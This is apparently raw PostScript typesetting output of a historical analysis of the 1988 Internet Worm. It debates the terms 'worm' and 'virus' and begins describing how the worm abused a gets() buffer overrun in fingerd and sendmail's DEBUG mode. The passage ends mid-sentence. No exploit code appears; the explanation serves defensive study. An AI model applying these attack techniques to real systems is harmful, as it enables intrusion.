1281(have)S
1500(used)S
1714(the)S
1867(term)S
10 I
2081(worm)S
10 R
2340(instead)S
2654(of)S
10 I
2768(virus)S
10 R
2999(based)S
3256(on)S
3386(its)S
3511(behavior.)S
3945(Members)S
4352(of)S
4465(the)S
4617(press)S
4852(have)S
3228 V
720(used)S
943(the)S
1105(term)S
10 I
1328(virus)S
10 R
1528(,)S
1593(possibly)S
1967(because)S
2322(their)S
2545(experience)S
3016(to)S
3134(date)S
3340(has)S
3513(been)S
3741(only)S
3959(with)S
4177(that)S
4367(form)S
4601(of)S
4724(security)S
3348 V
720(problem.)S
1158(This)S
1386(usage)S
1663(has)S
1846(been)S
2084(reinforced)S
2543(by)S
2693(quotes)S
3004(from)S
3248(computer)S
3674(managers)S
4105(and)S
4298(programmers)S
4879(also)S
3468 V
720(unfamiliar)S
1176(with)S
1394(the)S
1556(di)S
1634 H
	(f)show 10 -.5 mul h (f)show
10 R
1695(erence.)S
2049(For)S
2228(purposes)S
2623(of)S
2746(clarifying)S
3174(the)S
3336(terminology,)S
3890(let)S
4031(me)S
4194(de\256ne)S
4479(the)S
4642(di)S
4720 H
	(f)show 10 -.5 mul h (f)show
10 R
4781(erence)S
3588 V
720(between)S
1087(these)S
1327(two)S
1512(terms)S
1769(and)S
1947(give)S
2153(some)S
2398(citations)S
2771(as)S
2888(to)S
3000(their)S
3217(origins;)S
3557(these)S
3796(same)S
4035(de\256nitions)S
4492(were)S
4719(recently)S
3708 V
720(given)S
972(in)S
1080([9]:)S
3864 V
970(A)S
10 I
1072(worm)S
10 R
1330(is)S
1427(a)S
1501(program)S
1869(that)S
2049(can)S
2217(run)S
2380(independently)S
2976(and)S
3150(can)S
3318(propagate)S
3742(a)S
3817(fully)S
4037(working)S
4401(version)S
4726(of)S
4840(itself)S
3984 V
970(to)S
1086(other)S
1329(machines.)S
1799(It)S
1898(is)S
2003(derived)S
2340(from)S
2572(the)S
2732(word)S
10 I
2975(tapeworm)S
10 R
3375(,)S
3438(a)S
3520(parasitic)S
3896(organism)S
4306(that)S
4494(lives)S
4720(inside)S
4996(a)S
4104 V
970(host)S
1167(and)S
1341(uses)S
1543(its)S
1668(resources)S
2074(to)S
2182(maintain)S
2562(itself.)S
4260 V
970(A)S
10 I
1073(virus)S
10 R
1304(is)S
1402(a)S
1477(piece)S
1718(of)S
1832(code)S
2051(that)S
2232(adds)S
2446(itself)S
2677(to)S
2787(other)S
3024(programs,)S
3458(including)S
3868(operating)S
4277(systems.)S
4681(It)S
4774(cannot)S
4380 V
970(run)S
1134(independently\320it)S
1887(requires)S
2239(that)S
2419(its)S
2544(``host'')S
2873(program)S
3241(be)S
3365(run)S
3528(to)S
3636(activate)S
3976(it.)S
4117(As)S
4258(such,)S
4496(it)S
4582(has)S
4745(an)S
4869(ana-)S
4500 V
970(log)S
1134(to)S
1248(biological)S
1684(viruses)S
2003(\320)S
2139(those)S
2386(viruses)S
2705(are)S
2862(not)S
3026(considered)S
3494(alive)S
3724(in)S
3838(the)S
3996(usual)S
4243(sense;)S
4523(instead,)S
4868(they)S
4620 V
970(invade)S
1266(host)S
1463(cells)S
1676(and)S
1850(corrupt)S
2168(them,)S
2423(causing)S
2758(them)S
2988(to)S
3096(produce)S
3447(new)S
3643(viruses.)S
4860 V
10 B
720(2.1.)S
930(Worms)S
5016 V
10 R
970(The)S
1163(concept)S
1511(of)S
1632(a)S
1714(worm)S
1985(program)S
2361(that)S
2549(spreads)S
2887(itself)S
3126(from)S
3359(machine)S
3736(to)S
3853(machine)S
4230(was)S
4424(apparently)S
4884(\256rst)S
5136 V
720(described)S
1134(by)S
1266(John)S
1487(Brunner)S
1846(in)S
1956(1975)S
2188(in)S
2297(his)S
2445(classic)S
2742(science)S
3066(\256ction)S
3353(novel)S
10 I
3606(The)S
3787(Shockwave)S
4261(Rider)S
10 R
4483(.[5])S
4655(He)S
4802(called)S
5256 V
720(these)S
955(programs)S
10 I
1362(tapeworms)S
10 R
1831(that)S
2011(existed)S
2354(``inside'')S
2755(the)S
2907(computers)S
3353(and)S
3527(spread)S
3818(themselves)S
4293(to)S
4402(other)S
4638(machines.)S
5376 V
720(Ten)S
912(years)S
1159(ago,)S
1365(researchers)S
1849(at)S
1958(Xerox)S
2244(PARC)S
2542(built)S
2762(and)S
2942(experimented)S
3521(with)S
10 I
3735(worm)S
10 R
3999(programs.)S
4467(They)S
4708(reported)S
5496 V
720(their)S
935(experiences)S
1437(in)S
1577(1982)S
1809(in)S
1919([25],)S
2142(and)S
2318(cited)S
2544(Brunner)S
2903(as)S
3018(the)S
3172(inspiration)S
3632(for)S
3781(the)S
3936(name)S
10 I
4185(worm)S
10 R
4413(.)S
4501(Although)S
4912(not)S
5616 V
720(the)S
877(\256rst)S
1068(self-replicating)S
1707(programs)S
2119(to)S
2232(run)S
2400(in)S
2513(a)S
2592(network)S
2954(environment,)S
3519(these)S
3759(were)S
3987(the)S
4144(\256rst)S
4334(such)S
4551(programs)S
4962(to)S
5736 V
720(be)S
844(called)S
10 I
1112(worms)S
10 R
1379(.)S
5892 V
970(The)S
1157(worms)S
1461(built)S
1677(at)S
1781(PARC)S
2075(were)S
2300(designed)S
2687(to)S
2797(travel)S
3057(from)S
3284(machine)S
3655(to)S
3766(machine)S
4137(and)S
4314(do)S
4447(useful)S
4724(work)S
4962(in)S
6012 V
720(a)S
798(distributed)S
1260(environment\320they)S
2071(were)S
2298(not)S
2460(used)S
2677(at)S
2783(that)S
2967(time)S
3179(to)S
3291(break)S
3546(into)S
3736(systems.)S
4142(Because)S
4508(of)S
4625(this,)S
4829(some)S
6132 V
720(people)S
1025(prefer)S
1301(to)S
1419(call)S
1603(the)S
1765(Internet)S
2115(Worm)S
2410(a)S
10 I
2494(virus)S
10 R
2734(because)S
3089(it)S
3185(was)S
3380(destructive,)S
3883(and)S
4067(they)S
4279(believe)S
4607(worms)S
4919(are)S
6252 V
720(non-destructive.)S
1429(Not)S
1612(everyone)S
2010(agrees)S
2297(that)S
2480(the)S
2635(Internet)S
2978(Worm)S
3266(was)S
3454(destructive,)S
3950(however.)S
4381(Since)S
4636(intent)S
4896(and)S
6372 V
720(e)S
764 H
	(f)show 10 -.5 mul h (f)show
10 R
825(ect)S
1005(are)S
1190(sometimes)S
1682(di)S
1760 H
	(f)show 10 -.5 mul h (\256)show
10 R
1844(cult)S
2058(to)S
2200(judge)S
2486(because)S
2865(we)S
3045(lack)S
3275(complete)S
3705(information)S
4241(and)S
4449(have)S
4702(di)S
4780 H
	(f)show 10 -.5 mul h (f)show
10 R
4841(erent)S
6492 V
720(de\256nitions)S
1189(of)S
1318(those)S
1575(terms,)S
1868(using)S
2131(them)S
2377(as)S
2506(a)S
2595(naming)S
2940(criterion)S
3323(is)S
3435(clearly)S
3751(insu)S
3918 H
	(f)show 10 -.5 mul h (\256)show
10 R
4002(cient.)S
4296(Unless)S
4613(a)S
4702(di)S
4780 H
	(f)show 10 -.5 mul h (f)show
10 R
4841(erent)S
6612 V
720(naming)S
1055(scheme)S
1389(is)S
1491(generally)S
1897(adopted,)S
2273(programs)S
2685(such)S
2903(as)S
3021(this)S
3201(one)S
3380(should)S
3682(be)S
3811(called)S
10 I
4084(worms)S
10 R
4387(because)S
4738(of)S
4857(their)S
6732 V
720(method)S
1050(of)S
1163(propagation.)S
7920 V
EP
%%Page: 3 4
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2792(- 3 -)S
840 V
10 B
720(2.2.)S
930(Viruses)S
996 V
10 R
970(The)S
1164(\256rst)S
1359(published)S
1787(use)S
1959(of)S
2081(the)S
2242(word)S
10 I
2486(virus)S
10 R
2725(\(to)S
2875(my)S
3042(knowledge\))S
3553(to)S
3671(describe)S
4043(something)S
4500(that)S
4690(infects)S
4996(a)S
1116 V
720(computer)S
1142(was)S
1342(by)S
1487(David)S
1775(Gerrold)S
2129(in)S
2251(his)S
2412(science)S
2749(\256ction)S
3049(short)S
3293(stories)S
3598(about)S
3864(the)S
4030(G.O.D.)S
4365(machine.)S
4802(These)S
1236 V
720(stories)S
1012(were)S
1236(later)S
1444(combined)S
1869(and)S
2044(expanded)S
2457(to)S
2566(form)S
2791(the)S
2944(book)S
10 I
3175(When)S
3433(Harlie)S
3725(Was)S
3928(One)S
10 R
4094(.)S
4151([12])S
4349(A)S
4453(subplot)S
4780(in)S
4890(that)S
1356 V
720(book)S
963(described)S
1388(a)S
1475(program)S
1856(named)S
2165(VIRUS)S
2508(created)S
2838(by)S
2981(an)S
3118(unethical)S
3528(scientist.)S
1306 V
7 R
3881(*)S
1356 V
10 R
3960(A)S
4076(computer)S
4497(infected)S
4862(with)S
1476 V
720(VIRUS)S
1062(would)S
1353(randomly)S
1777(dial)S
1968(the)S
2131(phone)S
2416(until)S
2641(it)S
2738(found)S
3012(another)S
3352(computer.)S
3825(It)S
3927(would)S
4218(then)S
4431(break)S
4693(into)S
4890(that)S
1596 V
720(system)S
1032(and)S
1210(infect)S
1471(it)S
1561(with)S
1773(a)S
1851(copy)S
2079(of)S
2196(VIRUS.)S
2585(This)S
2797(program)S
3169(would)S
3453(in\256ltrate)S
3826(the)S
3982(system)S
4294(software)S
4672(and)S
4851(slow)S
1716 V
720(the)S
881(system)S
1198(down)S
1459(so)S
1587(much)S
1848(that)S
2037(it)S
2132(became)S
2475(unusable)S
2869(\(except)S
3201(to)S
3318(infect)S
3584(other)S
3828(machines\).)S
4332(The)S
4525(inventor)S
4896(had)S
1836 V
720(plans)S
977(to)S
1101(sell)S
1286(a)S
1376(program)S
1761(named)S
2074(VACCINE)S
2565(that)S
2762(could)S
3031(cure)S
3249(VIRUS)S
3596(and)S
3787(prevent)S
4133(infection,)S
4560(but)S
4735(disaster)S
1956 V
720(occurred)S
1098(when)S
1344(noise)S
1585(on)S
1715(a)S
1789(phone)S
2063(line)S
2243(caused)S
2544(VIRUS)S
2874(to)S
2982(mutate)S
3284(so)S
3403(VACCINE)S
3877(ceased)S
4172(to)S
4280(be)S
4404(e)S
4448 H
	(f)show 10 -.5 mul h (f)show
10 R
4509(ective.)S
2112 V
970(The)S
1157(term)S
10 I
1372(computer)S
1781(virus)S
10 R
2013(was)S
2201(\256rst)S
2390(used)S
2606(in)S
2717(a)S
2794(formal)S
3093(way)S
3292(by)S
3425(Fred)S
3641(Cohen)S
3935(at)S
4040(USC.)S
4293([6])S
4442(He)S
4591(de\256ned)S
4918(the)S
2232 V
720(term)S
943(to)S
1061(mean)S
1317(a)S
1401(security)S
1757(problem)S
2130(that)S
2320(attaches)S
2681(itself)S
2921(to)S
3039(other)S
3284(code)S
3512(and)S
3696(turns)S
3936(it)S
4032(into)S
4228(something)S
4685(that)S
4874(pro-)S
2352 V
720(duces)S
980(viruses;)S
1324(to)S
1435(quote)S
1690(from)S
1917(his)S
2067(paper:)S
2349(``We)S
2586(de\256ne)S
2863(a)S
2940(computer)S
3351(`virus')S
3651(as)S
3768(a)S
3846(program)S
4218(that)S
4402(can)S
4574(infect)S
4835(other)S
2472 V
720(programs)S
1138(by)S
1279(modifying)S
1737(them)S
1978(to)S
2097(include)S
2432(a)S
2517(possibly)S
2891(evolved)S
3247(copy)S
3481(of)S
3604(itself.'')S
3965(He)S
4121(claimed)S
4477(the)S
4639(\256rst)S
4835(com-)S
2592 V
720(puter)S
960(virus)S
1195(was)S
1385(``born'')S
1735(on)S
1870(November)S
2327(3,)S
2438(1983,)S
2699(written)S
3018(by)S
3154(himself)S
3490(for)S
3642(a)S
3722(security)S
4074(seminar)S
4426(course,)S
2542 V
7 R
4711(\262)S
2592 V
10 R
4782(and)S
4962(in)S
2712 V
720(his)S
874(Ph.)S
1042(D.)S
1176(dissertation)S
1674(he)S
1805(credited)S
2163(his)S
2317(advisor,)S
2673(L.)S
2796(Adleman,)S
3223(with)S
3437(originating)S
3912(the)S
4070(terminology.)S
4650(However,)S
2832 V
720(there)S
952(are)S
1136(accounts)S
1518(of)S
1634(virus)S
1867(programs)S
2277(being)S
2532(created)S
2852(at)S
2958(least)S
3175(a)S
3253(year)S
3458(earlier,)S
3771(including)S
4183(one)S
4361(written)S
4678(by)S
4812(a)S
4890(stu-)S
2952 V
720(dent)S
922(at)S
1024(Texas)S
1292(A&M)S
1561(during)S
1852(early)S
2081(1982.)S
2902 V
7 R
2306(*)S
3192 V
10 B
720(2.3.)S
930(An)S
1088(Opposing)S
1531(View)S
3348 V
10 R
970(In)S
1092(a)S
1175(widely)S
1486(circulated)S
1918(paper)S
2178([10],)S
2408(Eichin)S
2708(and)S
2891(Rochlis)S
3236(chose)S
3503(to)S
3621(call)S
3805(the)S
3967(November)S
4428(2nd)S
4618(program)S
4996(a)S
3468 V
720(virus.)S
1031(Their)S
1302(reasoning)S
1745(for)S
1916(this)S
2116(required)S
2503(reference)S
2927(to)S
3060(biological)S
3515(literature)S
3930(and)S
4129(observing)S
4578(distinctions)S
3588 V
720(between)S
10 I
1084(lytic)S
1288(viruses)S
10 R
1603(and)S
10 I
1779(lysogenic)S
2188(viruses.)S
10 R
2558(It)S
2651(further)S
2954(requires)S
3308(that)S
3491(we)S
3640(view)S
3867(the)S
4022(Internet)S
4365(as)S
4481(a)S
4558(whole)S
4835(to)S
4946(be)S
3708 V
720(the)S
10 I
872(infected)S
1218(host)S
10 R
1415(rather)S
1677(than)S
1879(each)S
2091(individual)S
2527(machine.)S
3864 V
970(Their)S
1221(explanation)S
1722(merely)S
2034(serves)S
2318(to)S
2431(underscore)S
2903(the)S
3061(dangers)S
3407(of)S
3526(co-opting)S
3945(terms)S
4203(from)S
4433(another)S
4768(discip-)S
3984 V
720(line)S
914(to)S
1036(describe)S
1412(phenomena)S
1916(within)S
2216(our)S
2393(own)S
2608(\(computing\).)S
3200(The)S
3398(original)S
3752(de\256nitions)S
4218(may)S
4433(be)S
4570(much)S
4835(more)S
4104 V
720(complex)S
1106(than)S
1321(we)S
1480(originally)S
1912(imagine,)S
2302(and)S
2489(attempts)S
2871(to)S
2992(maintain)S
3385(and)S
3572(justify)S
3871(the)S
4036(analogies)S
4456(may)S
4671(require)S
4996(a)S
4224 V
720(considerable)S
1254(e)S
1298 H
	(f)show 10 -.5 mul h (f)show
10 R
1359(ort.)S
1555(Here,)S
1803(it)S
1889(may)S
2091(also)S
2282(require)S
2594(an)S
2718(advanced)S
3124(degree)S
3419(in)S
3527(the)S
3679(biological)S
4109(sciences!)S
4380 V
970(The)S
1165(de\256nitions)S
1628(of)S
10 I
1751(worm)S
10 R
2019(and)S
10 I
2203(virus)S
10 R
2443(I)S
2516(have)S
2744(given,)S
3031(based)S
3298(on)S
3438(Cohen's)S
3811(and)S
3995(Denning's)S
4451(de\256nitions,)S
4940(do)S
4500 V
720(not)S
886(require)S
1206(detailed)S
1560(knowledge)S
2036(of)S
2157(biology)S
2501(or)S
2622(pathology.)S
3115(They)S
3357(also)S
3555(correspond)S
4035(well)S
4244(with)S
4459(our)S
4629(traditional)S
4620 V
720(understanding)S
1320(of)S
1437(what)S
1665(a)S
1743(computer)S
2154(``host'')S
2487(is.)S
2643(Although)S
3056(Eichin)S
3352(and)S
3531(Rochlis)S
3872(present)S
4195(a)S
4274(reasoned)S
4663(argument)S
4740 V
720(for)S
872(a)S
952(more)S
1192(precise)S
1509(analogy)S
1860(to)S
1973(biological)S
2408(viruses,)S
2751(we)S
2902(should)S
3204(bear)S
3410(in)S
3523(mind)S
3764(that)S
3949(the)S
4106(nomenclature)S
4684(has)S
4852(been)S
4860 V
720(adopted)S
1068(for)S
1217(the)S
1372(use)S
1538(of)S
1654(computer)S
2064(professionals)S
2624(and)S
2801(not)S
2962(biologists.)S
3440(The)S
3628(terminology)S
4150(should)S
4450(be)S
4577(descriptive,)S
4980 V
720(unambiguous,)S
1315(and)S
1489(easily)S
1752(understood.)S
2281(Using)S
2550(a)S
2624(nonintuitive)S
3138(de\256nition)S
3552(of)S
3665(a)S
3739(``computer)S
4212(host,'')S
4500(and)S
4674(introduc-)S
5100 V
720(ing)S
884(unfamiliar)S
1337(terms)S
1596(such)S
1816(as)S
10 I
1936(lysogenic)S
10 R
2350(does)S
2570(not)S
2735(serve)S
2982(these)S
3224(goals)S
3472(well.)S
3736(As)S
3884(such,)S
4129(the)S
4288(term)S
10 I
4508(worm)S
10 R
4773(should)S
5220 V
720(continue)S
1094(to)S
1202(be)S
1326(the)S
1478(name)S
1724(of)S
1837(choice)S
2127(for)S
2273(this)S
2448(program)S
2816(and)S
2990(others)S
3264(like)S
3444(it.)S
5580 V
10 B
720(3.)S
855(How)S
1085(the)S
1248(Worm)S
1555(Operated)S
5736 V
10 R
970(The)S
1162(Worm)S
1454(took)S
1669(advantage)S
2110(of)S
2230(\257aws)S
2478(in)S
2593(standard)S
2968(software)S
3348(installed)S
3724(on)S
3861(many)S
4120(U)S
8 R
4192(NIX)S
10 R
4371(systems.)S
4780(It)S
4879(also)S
5856 V
720(took)S
932(advantage)S
1370(of)S
1487(a)S
1565(mechanism)S
2054(used)S
2271(to)S
2383(simplify)S
2751(the)S
2906(sharing)S
3233(of)S
3349(resources)S
3758(in)S
3869(local)S
4096(area)S
4294(networks.)S
4718(Speci\256c)S
5976 V
720(patches)S
1056(for)S
1209(these)S
1451(\257aws)S
1699(have)S
1924(been)S
2149(widely)S
2458(circulated)S
2888(in)S
3003(days)S
3223(since)S
3465(the)S
3624(Worm)S
3916(program)S
4291(attacked)S
4660(the)S
4819(Inter-)S
6096 V
720(net.)S
940(Those)S
1227(\257aws)S
1481(are)S
1645(described)S
2070(here,)S
2308(along)S
2572(with)S
2792(some)S
3045(related)S
3358(problems,)S
3797(since)S
4044(we)S
4202(can)S
4382(learn)S
4623(something)S
6216 V
720(about)S
986(software)S
1373(design)S
1678(from)S
1916(them.)S
2215(This)S
2437(is)S
2548(then)S
2764(followed)S
3163(by)S
3307(a)S
3395(description)S
3883(of)S
4010(how)S
4226(the)S
4392(Worm)S
4691(used)S
4918(the)S
6336 V
720(\257aws)S
961(to)S
1069(invade)S
1365(systems.)S
6726 V
8 Y1
720(333333333333333333)S
6844 V
8 R
820(*)S
900(The)S
1048(second)S
1293(edition)S
1538(of)S
1628(the)S
1749(book,)S
1953(recently)S
2232(published,)S
2586(has)S
2716(been)S
2890(``updated'')S
3270(to)S
3356(omit)S
3526(this)S
3665(subplot)S
3924(about)S
4125(VIRUS.)S
6962 V
820(\262)S
900(It)S
972(is)S
1049(ironic)S
1258(that)S
1401(the)S
1522(Internet)S
1792(Worm)S
2019(was)S
2167(loosed)S
2399(on)S
2503(November)S
2863(2,)S
2947(the)S
3068(eve)S
3202(of)S
3292(this)S
3431(``birthday.'')S
7080 V
820(*)S
900(Private)S
1149(communication,)S
1688(Joe)S
1818(Dellinger.)S
7920 V
EP
%%Page: 4 5
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2792(- 4 -)S
840 V
10 B
720(3.1.)S
930(\256ngerd)S
1266(and)S
1458(gets)S
996 V
10 R
970(The)S
10 I
1159(finger)S
10 R
1432(program)S
1804(is)S
1905(a)S
1983(utility)S
2257(that)S
2441(allows)S
2736(users)S
2975(to)S
3087(obtain)S
3371(information)S
3878(about)S
4135(other)S
4375(users.)S
4670(It)S
4766(is)S
4868(usu-)S
1116 V
720(ally)S
901(used)S
1115(to)S
1224(identify)S
1566(the)S
1719(full)S
1889(name)S
2136(or)S
2250(login)S
2487(name)S
2734(of)S
2848(a)S
2923(user,)S
3145(whether)S
3497(a)S
3572(user)S
3769(is)S
3867(currently)S
4258(logged)S
4561(in,)S
4694(and)S
4868(pos-)S
1236 V
720(sibly)S
946(other)S
1182(information)S
1685(about)S
1938(the)S
2091(person)S
2388(such)S
2602(as)S
2716(telephone)S
3136(numbers)S
3512(where)S
3787(he)S
3913(or)S
4028(she)S
4193(can)S
4363(be)S
4489(reached.)S
4885(The)S
1356 V
10 I
720(fingerd)S
10 R
1043(program)S
1415(is)S
1516(intended)S
1894(to)S
2006(run)S
2173(as)S
2290(a)S
2368(daemon,)S
2743(or)S
2860(background)S
3365(process,)S
3723(to)S
3835(service)S
4151(remote)S
4462(requests)S
4823(using)S
1476 V
720(the)S
875(\256nger)S
1141(protocol.)S
1532([14])S
1732(This)S
1944(daemon)S
2294(program)S
2666(accepts)S
2993(connections)S
3504(from)S
3732(remote)S
4043(programs,)S
4479(reads)S
4723(a)S
4801(single)S
1596 V
720(line)S
900(of)S
1013(input,)S
1274(and)S
1448(then)S
1650(sends)S
1902(back)S
2120(output)S
2406(matching)S
2808(the)S
2960(received)S
3327(request.)S
1752 V
970(The)S
1155(bug)S
1335(exploited)S
1737(to)S
1845(break)S
10 I
2096(fingerd)S
10 R
2415(involved)S
2795(overrunning)S
3313(the)S
3465(bu)S
3565 H
	(f)show 10 -.5 mul h (f)show
10 R
3626(er)S
3733(the)S
3885(daemon)S
4232(used)S
4446(for)S
4593(input.)S
4885(The)S
1872 V
720(standard)S
1099(C)S
1207(language)S
1608(I/O)S
1782(library)S
2089(has)S
2263(a)S
2348(few)S
2538(routines)S
2900(that)S
3090(read)S
3301(input)S
3547(without)S
3893(checking)S
4293(for)S
4449(bounds)S
4778(on)S
4918(the)S
1992 V
720(bu)S
820 H
	(f)show 10 -.5 mul h (f)show
10 R
881(er)S
997(involved.)S
1441(In)S
1563(particular,)S
2009(the)S
10 I
2170(gets)S
10 R
2370(call)S
2554(takes)S
2799(input)S
3045(to)S
3163(a)S
3247(bu)S
3347 H
	(f)show 10 -.5 mul h (f)show
10 R
3408(er)S
3525(without)S
3871(doing)S
4139(any)S
4323(bounds)S
4652(checking;)S
2112 V
720(this)S
896(was)S
1082(the)S
1235(call)S
1410(exploited)S
1813(by)S
1944(the)S
2097(Worm.)S
2437(As)S
2578(will)S
2764(be)S
2888(explained)S
3306(later,)S
3538(the)S
3690(input)S
3926(overran)S
4260(the)S
4412(bu)S
4512 H
	(f)show 10 -.5 mul h (f)show
10 R
4573(er)S
4680(allocated)S
2232 V
720(for)S
866(it)S
952(and)S
1126(rewrote)S
1460(the)S
1612(stack)S
1847(frame,)S
2134(thus)S
2331(altering)S
2666(the)S
2818(behavior)S
3197(of)S
3310(the)S
3462(program.)S
2388 V
970(The)S
10 I
1156(gets)S
10 R
1348(routine)S
1662(is)S
1760(not)S
1919(the)S
2072(only)S
2281(routine)S
2595(with)S
2804(this)S
2980(\257aw.)S
3238(There)S
3501(is)S
3599(a)S
3674(whole)S
3949(family)S
4241(of)S
4355(routines)S
4709(in)S
4819(the)S
4973(C)S
2508 V
720(library)S
1021(that)S
1206(may)S
1413(also)S
1609(overrun)S
1954(bu)S
2054 H
	(f)show 10 -.5 mul h (f)show
10 R
2115(ers)S
2266(when)S
2517(decoding)S
2918(input)S
3159(or)S
3276(formatting)S
3732(output)S
4022(unless)S
4306(the)S
4462(user)S
4662(explicitly)S
2628 V
720(speci\256es)S
1094(limits)S
1353(on)S
1483(the)S
1635(number)S
1970(of)S
2083(characters)S
2516(to)S
2624(be)S
2748(converted.)S
2784 V
970(Although)S
1390(experienced)S
1913(C)S
2022(programmers)S
2596(are)S
2759(aware)S
3038(of)S
3163(the)S
3327(problems)S
3741(with)S
3961(these)S
4208(routines,)S
4598(many)S
4863(con-)S
2904 V
720(tinue)S
953(to)S
1064(use)S
1230(them.)S
1518(Worse,)S
1836(their)S
2052(format)S
2351(is)S
2451(in)S
2562(some)S
2806(sense)S
3055(codi\256ed)S
3410(not)S
3571(only)S
3781(by)S
3913(historical)S
4317(inclusion)S
4716(in)S
4826(U)S
8 R
4898(NIX)S
3024 V
10 R
720(and)S
904(the)S
1066(C)S
1173(language,)S
1598(but)S
1766(more)S
2011(formally)S
2395(in)S
2513(the)S
2675(forthcoming)S
3209(ANSI)S
3482(language)S
3882(standard)S
4260(for)S
4416(C.)S
4579(The)S
4775(hazard)S
3144 V
720(with)S
934(these)S
1175(calls)S
1394(is)S
1497(that)S
1682(any)S
1861(network)S
2223(server)S
2501(or)S
2619(privileged)S
3059(program)S
3432(using)S
3684(them)S
3919(may)S
4126(possibly)S
4495(be)S
4624(comprom-)S
3264 V
720(ised)S
911(by)S
1041(careful)S
1347(precalculation)S
1942(of)S
2055(the)S
2207(\(in\)appropriate)S
2835(input.)S
3420 V
970(Interestingly,)S
1533(at)S
1638(least)S
1854(two)S
2038(long-standing)S
2622(\257aws)S
2867(based)S
3128(on)S
3262(this)S
3441(underlying)S
3908(problem)S
4275(have)S
4497(recently)S
4852(been)S
3540 V
720(discovered)S
1185(in)S
1296(other)S
1534(standard)S
1905(BSD)S
2133(U)S
8 R
2205(NIX)S
10 R
2380(commands.)S
2901(Program)S
3277(audits)S
3548(by)S
3680(various)S
4006(individuals)S
4483(have)S
4703(revealed)S
3660 V
720(other)S
973(potential)S
1371(problems,)S
1816(and)S
2008(many)S
2278(patches)S
2626(have)S
2863(been)S
3100(circulated)S
3542(since)S
3796(November)S
4266(to)S
4393(deal)S
4608(with)S
4835(these)S
3780 V
720(\257aws.)S
1030(Despite)S
1379(this,)S
1593(the)S
1759(library)S
2069(routines)S
2435(will)S
2635(continue)S
3023(to)S
3145(be)S
3283(used,)S
3535(and)S
3723(as)S
3850(our)S
4027(memory)S
4404(of)S
4530(this)S
4718(incident)S
3900 V
720(fades,)S
985(new)S
1181(\257aws)S
1422(may)S
1624(be)S
1748(introduced)S
2205(with)S
2413(their)S
2626(use.)S
4140 V
10 B
720(3.2.)S
930(Sendmail)S
4296 V
10 R
970(The)S
1160(sendmail)S
1556(program)S
1929(is)S
2031(a)S
2110(mailer)S
2400(designed)S
2790(to)S
2903(route)S
3143(mail)S
3356(in)S
3470(a)S
3550(heterogeneous)S
4162(internetwork.)S
4733([3])S
4885(The)S
4416 V
720(program)S
1090(operates)S
1454(in)S
1564(several)S
1878(modes,)S
2196(but)S
2356(the)S
2510(one)S
2686(exploited)S
3090(by)S
3222(the)S
3376(Worm)S
3663(involves)S
4034(the)S
4188(mailer)S
4474(operating)S
4882(as)S
4996(a)S
4536 V
720(daemon)S
1090(\(background\))S
1681(process.)S
2089(In)S
2226(this)S
2425(mode,)S
2726(the)S
2902(program)S
3294(is)S
3415(``listening'')S
3946(on)S
4100(a)S
4198(TCP)S
4437(port)S
4653(\(#25\))S
4924(for)S
4656 V
720(attempts)S
1091(to)S
1200(deliver)S
1508(mail)S
1717(using)S
1965(the)S
2118(standard)S
2487(Internet)S
2828(protocol,)S
3217(SMTP)S
3510(\(Simple)S
3858(Mail)S
4078(Transfer)S
4446(Protocol\).)S
4874([20])S
4776 V
720(When)S
996(such)S
1217(an)S
1349(attempt)S
1687(is)S
1792(detected,)S
2187(the)S
2347(daemon)S
2701(enters)S
2977(into)S
3171(a)S
3253(dialog)S
3541(with)S
3757(the)S
3917(remote)S
4232(mailer)S
4525(to)S
4641(determine)S
4896 V
720(sender,)S
1035(recipient,)S
1439(delivery)S
1796(instructions,)S
2318(and)S
2492(message)S
2860(contents.)S
5052 V
970(The)S
1160(bug)S
1345(exploited)S
1752(in)S
10 I
1865(sendmail)S
10 R
2261(had)S
2440(to)S
2553(do)S
2688(with)S
2901(functionality)S
3447(provided)S
3838(by)S
3974(a)S
4054(debugging)S
4512(option)S
4804(in)S
4918(the)S
5172 V
720(code.)S
1004(The)S
1200(Worm)S
1496(would)S
1787(issue)S
2027(the)S
10 I
2189(DEBUG)S
10 R
2567(command)S
3001(to)S
10 I
3119(sendmail)S
10 R
3520(and)S
3704(then)S
3916(specify)S
4244(the)S
4406(recipient)S
4795(of)S
4918(the)S
5292 V
720(message)S
1093(as)S
1211(a)S
1290(set)S
1436(of)S
1554(commands)S
2022(instead)S
2340(of)S
2458(a)S
2537(user)S
2738(address.)S
3127(In)S
3245(normal)S
3563(operation,)S
4000(this)S
4180(is)S
4282(not)S
4445(allowed,)S
4821(but)S
4984(it)S
5412 V
720(is)S
821(present)S
1143(in)S
1255(the)S
1410(debugging)S
1865(code)S
2086(to)S
2197(allow)S
2452(testers)S
2740(to)S
2851(verify)S
3122(that)S
3305(mail)S
3516(is)S
3616(arriving)S
3965(at)S
4070(a)S
4147(particular)S
4562(site)S
4734(without)S
5532 V
720(the)S
885(need)S
1116(to)S
1237(invoke)S
1553(the)S
1719(address)S
2062(resolution)S
2506(routines.)S
2927(By)S
3088(using)S
3349(this)S
3538(feature,)S
3883(testers)S
4182(can)S
4364(run)S
4541(programs)S
4962(to)S
5652 V
720(display)S
1054(the)S
1221(state)S
1449(of)S
1577(the)S
1744(mail)S
1967(system)S
2290(without)S
2641(sending)S
2997(mail)S
3220(or)S
3347(establishing)S
3869(a)S
3957(separate)S
4327(login)S
4577(connection.)S
5772 V
720(This)S
937(debug)S
1220(option)S
1515(is)S
1621(often)S
1865(used)S
2087(because)S
2441(of)S
2563(the)S
2724(complexity)S
3213(of)S
3335(con\256guring)S
3835(sendmail)S
4235(for)S
4390(local)S
4623(conditions)S
5892 V
720(and)S
894(it)S
980(is)S
1077(often)S
1312(left)S
1475(turned)S
1760(on)S
1890(by)S
2020(many)S
2272(vendors)S
2618(and)S
2792(site)S
2961(administrators.)S
6048 V
970(The)S
1161(sendmail)S
1558(program)S
1933(is)S
2037(of)S
2157(immense)S
2555(importance)S
3041(on)S
3178(most)S
3410(Berkeley-derived)S
4139(\(and)S
4353(other\))S
4628(U)S
8 R
4700(NIX)S
10 R
4879(sys-)S
6168 V
720(tems)S
945(because)S
1296(it)S
1388(handles)S
1729(the)S
1887(complex)S
2267(tasks)S
2503(of)S
2622(mail)S
2836(routing)S
3161(and)S
3341(delivery.)S
3759(Yet,)S
3964(despite)S
4282(its)S
4412(importance)S
4896(and)S
6288 V
720(widespread)S
1219(use,)S
1422(most)S
1662(system)S
1985(administrators)S
2602(know)S
2869(little)S
3098(about)S
3365(how)S
3582(it)S
